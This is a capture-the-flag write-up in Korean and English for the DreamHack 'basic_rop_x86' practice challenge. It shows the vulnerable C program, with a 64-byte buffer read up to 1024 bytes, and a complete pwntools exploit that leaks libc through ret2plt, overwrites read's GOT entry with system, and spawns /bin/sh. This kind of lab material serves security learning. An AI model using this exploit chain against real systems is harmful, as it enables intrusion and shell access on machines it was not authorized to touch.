
DreamHack: System Hacking/F Stage 7

basic_rop_x86

[소스코드]

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


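/* SIGALRM handler: report the timeout and terminate the process.
 *
 * Runs asynchronously when the 30 s alarm armed in initialize() fires, so it
 * must only use async-signal-safe calls: write(2) instead of puts(3) and
 * _exit(2) instead of exit(3).  The exit status (-1 -> 255) is unchanged.
 *
 * sig: the signal number delivered by signal(2); unused.
 */
void alarm_handler(int sig) {
    static const char msg[] = "TIME OUT\n";

    (void)sig;  /* not needed; silences unused-parameter warnings */
    write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    _exit(-1);
}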


/* Challenge setup: turn off stdio buffering on stdin and stdout and arm a
 * 30-second SIGALRM watchdog that is serviced by alarm_handler(). */
void initialize() {
    FILE *streams[] = { stdin, stdout };
    size_t i;

    for (i = 0; i < sizeof(streams) / sizeof(streams[0]); i++) {
        setvbuf(streams[i], NULL, _IONBF, 0);
    }

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

/* Challenge entry point.
 *
 * buf is 0x40 (64) bytes and zero-initialised, but read() is allowed to write
 * up to 0x400 (1024) bytes into it.  This is the stack buffer overflow the
 * exploit below relies on: bytes past the 64th land on the stack beyond buf
 * (saved frame pointer and return address, judging by the offsets the exploit
 * uses).  A bounded call, read(0, buf, sizeof(buf)), would remove the
 * primitive; it is left as-is here because the challenge depends on it.
 *
 * write() always echoes exactly sizeof(buf) bytes, regardless of how many
 * read() actually returned (its return value is discarded).  Because buf is
 * zero-initialised this does not expose uninitialised stack contents.
 */
int main(int argc, char *argv[]) {
    char buf[0x40] = {};

    initialize();

    read(0, buf, 0x400);  /* NOTE(review): length 0x400 > sizeof(buf) == 0x40 */
    write(1, buf, sizeof(buf));

    return 0;
}

 

[exploit]

*유념할 점: x64 아키텍처에서는 함수의 인자를 레지스터에 담아 전달하지만, x86 아키텍처에서는 함수의 인자를 스택에 푸시하여 전달한다.

exploit payload를 보낸 후 스택의 모습

# pwntools exploit for basic_rop_x86: ret2plt leak -> libc base -> GOT overwrite.
# Each stage depends on a property of the target binary that the page assumes
# rather than shows:
#   - no stack canary, so the 0x400-byte read() past the 0x40-byte buf reaches
#     the saved return address;
#   - a writable GOT (no Full RELRO) for stage (2);
#   - fixed, non-PIE code addresses for the PLT entries and gadgets below.
# Full RELRO, PIE or a stack canary would each defeat one of these stages.
from pwn import *
context.arch = 'i386'
p = process("./basic_rop_x86")
e = ELF("./basic_rop_x86")
l = ELF("./libc.so.6")  # libc shipped with the challenge; the offsets below come from it

read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
# Gadget addresses are hard-coded for this exact binary (no PIE).  From their
# use below they appear to be pop-N-then-ret gadgets (pop: 1 value, pop3: 3)
# -- TODO confirm with a gadget finder.  pop2 is not used by this payload.
pop = 0x804868b
pop2 = 0x804868a
pop3 = 0x8048689

buf = b'A'*64  # what the binary echoes back: write(1, buf, sizeof(buf)) == 64 bytes
payload = b'A'*68 + b'B'*4  # 0x40 buf + 4 bytes padding + 4-byte saved ebp (layout inferred from the offsets; not shown on the page)
# x86 cdecl: arguments sit on the stack after the return address, so each call
# is followed by a pop-N gadget that discards its N arguments before the next one.
payload += p32(write_plt) + p32(pop3) + p32(1) + p32(read_got) + p32(4) # (1) write(1, read_got, 4) == get addr of read()
payload += p32(read_plt) + p32(pop3) + p32(0) + p32(read_got) + p32(12) # (2) read(0, read_got, 12) == GOT Overwrite & overwrite [read_got+0x4]
payload += p32(read_plt) + p32(pop) + p32(read_got+0x4) # (3) read("/bin/sh") == system("/bin/sh")

p.send(payload)
p.recvuntil(buf)  # skip the 64 echoed bytes; the next 4 bytes are the stage (1) leak
read = u32(p.recvn(4))  # resolved libc address of read()
libc_base = read - l.symbols['read']  # only valid if ./libc.so.6 is the libc the target actually loaded
system = libc_base + l.symbols['system']

print('read:', hex(read))
print('libc_base:', hex(libc_base))
print('system:', hex(system))

# Exactly 12 bytes, matching the count in stage (2): the first 4 replace
# read's GOT entry, the remaining 8 land at read_got+0x4, which stage (3)
# passes as the argument.  A different length would leave the read() in
# stage (2) blocked or misaligned.
p.send(p32(system) + b'/bin/sh\x00') # (2) GOT Overwrite(read()->system()) + send "/bin/sh" to [read_got+0x4]

p.interactive()
